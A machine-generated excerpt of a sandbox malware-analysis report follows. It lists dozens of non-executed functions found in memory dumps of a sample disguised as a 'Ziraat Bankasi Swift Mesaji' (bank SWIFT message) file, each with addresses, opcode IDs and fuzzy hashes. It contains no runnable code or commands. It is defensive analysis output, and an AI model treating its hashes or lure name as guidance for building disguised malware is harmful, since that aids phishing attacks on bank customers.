                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 843b7cd3be7d83f2d653929781a423d1e8b5ea43c6cae0e5e45fa5f25360962c
                                                                          • Instruction ID: e9753db74341f8307789c2ca103ac450fce5af50a29943f8fc13d9667860bd43
                                                                          • Opcode Fuzzy Hash: 843b7cd3be7d83f2d653929781a423d1e8b5ea43c6cae0e5e45fa5f25360962c
                                                                          • Instruction Fuzzy Hash: 7EC012718043094AC656F7A9F849A557B6AE7806087508910A00A0A24DEE745CB54694

                                                                          Non-executed Functions

                                                                          Function 06E58738 Relevance: 2.0, Strings: 1, Instructions: 739COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4542334944.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e50000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Te]q
                                                                          • API String ID: 0-52440209
                                                                          • Opcode ID: c90cc63d65af58e7168d734454ed9c8cff88fad201e864839907844d73b56597
                                                                          • Instruction ID: e38fd3812465f52201732adcc0066351aab054f61dd695d73751e789ce6ef801
                                                                          • Opcode Fuzzy Hash: c90cc63d65af58e7168d734454ed9c8cff88fad201e864839907844d73b56597
                                                                          • Instruction Fuzzy Hash: 7972D275A01229CFDB65DF64D894BEEBBB2BB89304F1085E9D80967364DB319E81CF40
                                                                          Function 05410B20 Relevance: 1.9, Strings: 1, Instructions: 601COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4539306412.0000000005410000.00000040.00000800.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_5410000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: .5uq
                                                                          • API String ID: 0-910421107
                                                                          • Opcode ID: 777f0203024d8003369b5e1773da84c9bdf617856419b2b71178f9e57322a7cc
                                                                          • Instruction ID: 87ee30700f7d32e3e46a275b835b6bf2f6462110da561a99722f5c50dc051bab
                                                                          • Opcode Fuzzy Hash: 777f0203024d8003369b5e1773da84c9bdf617856419b2b71178f9e57322a7cc
                                                                          • Instruction Fuzzy Hash: 7F628B74E012298FDB68DF69C984BDDBBB2BB89304F1085EAD509A7354DB319E81CF50
                                                                          Function 02BED690 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c75b5d4ccff9b827c1f53354edc4fbc563d854549bc55f60744d590e80d46e5b
                                                                          • Instruction ID: 95aee63d4fa7f08dfff254bafe4bb272025a802f6c250eba4d839adb37b08815
                                                                          • Opcode Fuzzy Hash: c75b5d4ccff9b827c1f53354edc4fbc563d854549bc55f60744d590e80d46e5b
                                                                          • Instruction Fuzzy Hash: ECC1C074E01219CFDB18DFA5D984B9DBBB2BF89304F2091A9D809AB358DB355E85CF10
                                                                          Function 02BEFA88 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1e1f1d7524a5b92ac74050d812c2167190d6891f288886b6e4aa49f878ce3e43
                                                                          • Instruction ID: 2c74484952112cb464afdcaa5c1947a00cbe1d4b1e01801480f3c3b954d571df
                                                                          • Opcode Fuzzy Hash: 1e1f1d7524a5b92ac74050d812c2167190d6891f288886b6e4aa49f878ce3e43
                                                                          • Instruction Fuzzy Hash: 32C1B075E01218CFDB18DFA5C994BADBBB2BF89304F2081A9D409AB358DB355E85CF50
                                                                          Function 02BE2AF0 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6156d8f066dfa4b214f9ed344debcc472ca44bd725901ef4ef8784647d346a48
                                                                          • Instruction ID: 4f0a8f9e2c63ffc04f83b055fd3d69063540d3b8df7e07a8b11df0dc540fe1c4
                                                                          • Opcode Fuzzy Hash: 6156d8f066dfa4b214f9ed344debcc472ca44bd725901ef4ef8784647d346a48
                                                                          • Instruction Fuzzy Hash: AEC1B075E01218CFDB19DFA5C994B9DBBB2BF89304F2080A9D809AB354DB359E85CF50
                                                                          Function 02BEA6C8 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8a1bcb411a1c2aaaea63f95a64d2c5f41d8cf044fdab8fc4cd4e111d6750fbc8
                                                                          • Instruction ID: 9fddfcb4f4aee0dca8f36dcf655d4c79fefd9c65107dc3a66a06a13d658e30bf
                                                                          • Opcode Fuzzy Hash: 8a1bcb411a1c2aaaea63f95a64d2c5f41d8cf044fdab8fc4cd4e111d6750fbc8
                                                                          • Instruction Fuzzy Hash: B2C1C175E01218CFDB18DFA5C994B9DBBB2BF89304F2090A9D409AB354DB359E85CF50
                                                                          Function 02BED238 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: df85717c3a0fe3bda6b19aabeb1ef6b0fc9095a8605f1106d601d151ab8acd3a
                                                                          • Instruction ID: 2cbadc07c197629dfca6b26dcae18de3cd2e950f29183be225900e7f65cf80c5
                                                                          • Opcode Fuzzy Hash: df85717c3a0fe3bda6b19aabeb1ef6b0fc9095a8605f1106d601d151ab8acd3a
                                                                          • Instruction Fuzzy Hash: 72C1B075E01219CFDB19DFA5C984B9DBBB2BF89304F2080A9D809AB354DB359E85CF50
                                                                          Function 02BEF630 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 052134ec9e7bf3fb61ed34ce43d4a65cc37aa51714e31283ff4ca00b6cf35fbb
                                                                          • Instruction ID: 186abc44d9ab8f6bcb471abe10cb6e9cc84afa25d9e2d303fb77fe0dc9637d31
                                                                          • Opcode Fuzzy Hash: 052134ec9e7bf3fb61ed34ce43d4a65cc37aa51714e31283ff4ca00b6cf35fbb
                                                                          • Instruction Fuzzy Hash: 37C1B075E01218CFDB18DFA5C944B9DBBB2BF89304F2090A9D409AB3A4DB355E85CF50
                                                                          Function 02BE9E18 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b959d6c050e3472a55e6d8908c533dc1f5308998c1c6acaab5ab20bcb2a39570
                                                                          • Instruction ID: d137b8d016466f61a5121e2fb4ade45787c150b80378cbb8ab23ed8fb4190004
                                                                          • Opcode Fuzzy Hash: b959d6c050e3472a55e6d8908c533dc1f5308998c1c6acaab5ab20bcb2a39570
                                                                          • Instruction Fuzzy Hash: 2AC1C075E01218CFDB58DFA5C984B9DBBB2BF89304F2080A9D809AB354DB359E85CF50
                                                                          Function 02BEA270 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a50f1c1621b63e4cd535596be9c987abc39d5aefaccedef720e128b816ef377e
                                                                          • Instruction ID: edb22e60b0b780f18573167108b61ff269e8d93b7589bec0030ff935571c5c96
                                                                          • Opcode Fuzzy Hash: a50f1c1621b63e4cd535596be9c987abc39d5aefaccedef720e128b816ef377e
                                                                          • Instruction Fuzzy Hash: 59C1B075E01218CFDB19DFA5C984B9DBBB2BF89304F2080A9D409AB354DB355E85CF50
                                                                          Function 02BE33A0 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9f30be3e2192b9ecd064c83976173b65a8cf215651cc0c3499b27efef586bee0
                                                                          • Instruction ID: 967725b6242fa175af3e29bbbd586b88aa01f99e9750b8a81dd93b29a6c6a68a
                                                                          • Opcode Fuzzy Hash: 9f30be3e2192b9ecd064c83976173b65a8cf215651cc0c3499b27efef586bee0
                                                                          • Instruction Fuzzy Hash: 02C1C074E01218CFDB19DFA5C994BADBBB2BF89304F2080A9D409AB354DB359E85CF50
                                                                          Function 02BE37F8 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8147023104bfac5f855f8348915cb942a943cf84707c49a9087789d49bcbe927
                                                                          • Instruction ID: 02760f2273f7f0c98d7e25c04113beffc846e810012b8f210448d480f9e0a1ba
                                                                          • Opcode Fuzzy Hash: 8147023104bfac5f855f8348915cb942a943cf84707c49a9087789d49bcbe927
                                                                          • Instruction Fuzzy Hash: 72C1B075E01218CFDB58DFA5C984BADBBB2BF89304F2090A9D409AB354DB359E85CF50
                                                                          Function 02BEB3D0 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c4fc0f3d76ce03c0cff63765979b55fd49e6f1641d1022279fff237add123fac
                                                                          • Instruction ID: 182d1d59fbd8e91d3090600b72710181fade2d4b5962a964b56bf44239288307
                                                                          • Opcode Fuzzy Hash: c4fc0f3d76ce03c0cff63765979b55fd49e6f1641d1022279fff237add123fac
                                                                          • Instruction Fuzzy Hash: E5C1BF75E01218CFDB19DFA5C994B9DBBB2BF89304F2080A9D409AB358DB359E85CF50
                                                                          Function 02BEAB20 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 12a3dd54d5f40196c69e48402d05f4ae916b6d4b4cfafdb699a008922ad0ada3
                                                                          • Instruction ID: bf7a99ff99210221134e94fc5e74a2653de445782c132f05317e3cd8e8ea9324
                                                                          • Opcode Fuzzy Hash: 12a3dd54d5f40196c69e48402d05f4ae916b6d4b4cfafdb699a008922ad0ada3
                                                                          • Instruction Fuzzy Hash: 03C1B075E01218CFDB18DFA5D994B9DBBB2BF89304F2080A9D409AB358DB355E85CF50
                                                                          Function 02BEAF78 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c884026435fbde56442a984f0d1309ae675fdc9e9afdf0360ba6ab44a1a97e60
                                                                          • Instruction ID: c2a5e6e99b1790143f4b512ba36a5eb069257c20e9145d00444c3fe00ff017b3
                                                                          • Opcode Fuzzy Hash: c884026435fbde56442a984f0d1309ae675fdc9e9afdf0360ba6ab44a1a97e60
                                                                          • Instruction Fuzzy Hash: 07C1C275E01218CFDB18DFA5D984B9DBBB2BF89304F2081A9D409AB354DB359E85CF50
                                                                          Function 02BE2F48 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d9576e28e7811194925b49484922fc7cd988b875eeb3cf1eec42c96a12eb0328
                                                                          • Instruction ID: 96bb78ae8d824ad0ee6015244927087a7fe3c9d09433e5834939b66945990b0a
                                                                          • Opcode Fuzzy Hash: d9576e28e7811194925b49484922fc7cd988b875eeb3cf1eec42c96a12eb0328
                                                                          • Instruction Fuzzy Hash: 82C1B175E01218CFDB18DFA5C994B9DBBB2BF89304F2081A9D409AB358DB359E85CF50
                                                                          Function 02BE40A8 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 74ce9ca6eb1638dcb5d1de765765d782d8a95b8b9ed58a4ad933d2fcb56b4fe7
                                                                          • Instruction ID: 5e090e897a0c479b0d02abbe29c5e941e42ed3eb7b3e866779f842083c30ffc1
                                                                          • Opcode Fuzzy Hash: 74ce9ca6eb1638dcb5d1de765765d782d8a95b8b9ed58a4ad933d2fcb56b4fe7
                                                                          • Instruction Fuzzy Hash: B6C1C075E01218CFDB18DFA5D984B9DBBB2BF89304F2080A9D409AB354DB359E85CF50
                                                                          Function 02BE0498 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 676a2dd74184be3ff9ed67a6c99c2c255a2340e6f26e9d95d63c854077bc429a
                                                                          • Instruction ID: d1b50629877e9b4e981e26905811fea34290329e027a30453286f5387e7abf71
                                                                          • Opcode Fuzzy Hash: 676a2dd74184be3ff9ed67a6c99c2c255a2340e6f26e9d95d63c854077bc429a
                                                                          • Instruction Fuzzy Hash: BEC1B075E01218CFDB19DFA5C984B9DBBB2BF89304F2084A9D409AB358DB359E85CF50
                                                                          Function 02BEBC80 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f252d646eae2a0380d17ac82f08476073d56e811849f5fd29bbfb6fe1033f51a
                                                                          • Instruction ID: afa480e9adc1bd7068b58a2e764f99bcbf8ec6aff6c83c2b529b2ea63102472a
                                                                          • Opcode Fuzzy Hash: f252d646eae2a0380d17ac82f08476073d56e811849f5fd29bbfb6fe1033f51a
                                                                          • Instruction Fuzzy Hash: C8C1C075E01218CFDB18DFA5C984B9DBBB2BF89304F2081A9D809AB359DB355E85CF50
                                                                          Function 02BE08F0 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 66e27c44ae013fc10060efcaf2c7673bb7ffbcbe4fcfc2e9d78192e5d571d50e
                                                                          • Instruction ID: 9c790939620ebf3070869b030376139099e238c033bb270b770d1004a207e03e
                                                                          • Opcode Fuzzy Hash: 66e27c44ae013fc10060efcaf2c7673bb7ffbcbe4fcfc2e9d78192e5d571d50e
                                                                          • Instruction Fuzzy Hash: 7AC1B074E01218CFDB18DFA5C984B9DBBB2BF88304F2085A9D409AB358DB355E85CF10
                                                                          Function 02BEC0D8 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fb8febe1291b0269ce171eff1f003763a794428fbbee9494a5b8d195ebe1c287
                                                                          • Instruction ID: ec66c2ab1c79086f1026ea99621c2983bb62c2a9e4d042d7839ed690735e4275
                                                                          • Opcode Fuzzy Hash: fb8febe1291b0269ce171eff1f003763a794428fbbee9494a5b8d195ebe1c287
                                                                          • Instruction Fuzzy Hash: 62C1B175E01218CFDB58DFA5D984B9DBBB2BF89304F2080AAD409AB354DB355E85CF50
                                                                          Function 02BEE4D0 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f8168932405c3b3b8c0950eb8a0a3f5ff57b5a0cfcbd9727028e3874b86c65f4
                                                                          • Instruction ID: d576ebe77298524154f1e12ecc71192ade2a7cabf49b683a8224d969b66092ee
                                                                          • Opcode Fuzzy Hash: f8168932405c3b3b8c0950eb8a0a3f5ff57b5a0cfcbd9727028e3874b86c65f4
                                                                          • Instruction Fuzzy Hash: 29C1B075E01218CFDB18DFA5C984B9DBBB2BF89304F2081A9D409AB394DB359E85CF50
                                                                          Function 02BEB828 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1b2b35c6900f93f449b8ca1017c52cbb31ddb15c42c2c0c7587898ccd6f27fd5
                                                                          • Instruction ID: 689b5dd9bb560a2c29753655385bae72f2238784c3ae393ec1d4ad3ec59fbdcf
                                                                          • Opcode Fuzzy Hash: 1b2b35c6900f93f449b8ca1017c52cbb31ddb15c42c2c0c7587898ccd6f27fd5
                                                                          • Instruction Fuzzy Hash: 36C1B075E01218CFDB18DFA5D984B9DBBB2BF89304F2090A9D409AB358DB355E86CF50
                                                                          Function 02BEDC20 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b72c69283142c26b510af5a27d15985a0a99830ed09334af3d74da5eee99536f
                                                                          • Instruction ID: 6b88e72b3742e5d6acf4760ff73bd2781590598e3880923098959f84d0f0cca1
                                                                          • Opcode Fuzzy Hash: b72c69283142c26b510af5a27d15985a0a99830ed09334af3d74da5eee99536f
                                                                          • Instruction Fuzzy Hash: 6AC1C075E01218CFDB18DFA5C984B9DBBB2BF89304F2080A9D809AB355DB359E85CF50
                                                                          Function 02BEE078 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ddfe7a2eddcf5532abdc8d6b5bf611a4c60a7af011d2c88ba9cc2b59776bdc78
                                                                          • Instruction ID: 63dbb790eba9df6ab9e4e90a19b1450c7cf820d111b1681ae3a5f8efcb4d1f00
                                                                          • Opcode Fuzzy Hash: ddfe7a2eddcf5532abdc8d6b5bf611a4c60a7af011d2c88ba9cc2b59776bdc78
                                                                          • Instruction Fuzzy Hash: 22C1C075E01218CFDB19DFA5D984B9DBBB2BF89304F2080A9D409AB358DB359E85CF50
                                                                          Function 02BE3C50 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c88e3ce86c175057577db280117f8447936306f0e97f66c3c46c867cb1150901
                                                                          • Instruction ID: 83b411f67dfb1df876725d1f61c6bfb77cca4127adf6622b6b607eaebbb79c92
                                                                          • Opcode Fuzzy Hash: c88e3ce86c175057577db280117f8447936306f0e97f66c3c46c867cb1150901
                                                                          • Instruction Fuzzy Hash: E3C1C075E01218CFDB18DFA5C984B9DBBB2BF89304F2080A9D409AB359DB359E85CF50
                                                                          Function 02BE0040 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 27d1af7bddac110d84038d36f6d72ac2df38609152dbda91bce543dea90b3fd3
                                                                          • Instruction ID: 4815fca8c683957997d58dae8a2c7b41308f878c183400fb3096a1d292f2d689
                                                                          • Opcode Fuzzy Hash: 27d1af7bddac110d84038d36f6d72ac2df38609152dbda91bce543dea90b3fd3
                                                                          • Instruction Fuzzy Hash: 71C1B075E01218CFDB18DFA5D984B9DBBB2BF89304F2084A9D409AB358DB355E85CF10
                                                                          Function 02BE11A0 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 97b6ff828aa4c7d25ced0d7d6a82f363cd49d7eea5503f32e8e6070620cc1c5d
                                                                          • Instruction ID: 853720b3433094aaa65d7abf3f0cf28dcb4db769910b4cdcb932a0772956ed6c
                                                                          • Opcode Fuzzy Hash: 97b6ff828aa4c7d25ced0d7d6a82f363cd49d7eea5503f32e8e6070620cc1c5d
                                                                          • Instruction Fuzzy Hash: BDC1B375E01218CFDB18DFA5D994B9DBBB2BF89304F2080A9D409AB358DB355E85CF50
                                                                          Function 02BEC988 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.4528142851.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_2be0000_Ziraat Bankasi Swift Mesaji.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: abc2489835b39aa76c1861dcb489bf24877f68035c363ff07cbb5c92c05826c5
                                                                          • Instruction ID: efce532b3fd5c52a6a51674f3897203d8bdde10fa165a1fc0f6215da1e31b422
                                                                          • Opcode Fuzzy Hash: abc2489835b39aa76c1861dcb489bf24877f68035c363ff07cbb5c92c05826c5
                                                                          • Instruction Fuzzy Hash: 3BC1D075E01218CFDB18DFA5D984B9DBBB2BF89304F2080AAD409AB358DB355E85CF50
                                                                          Function 02BEED80 Relevance: .3, Instructions: 268COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
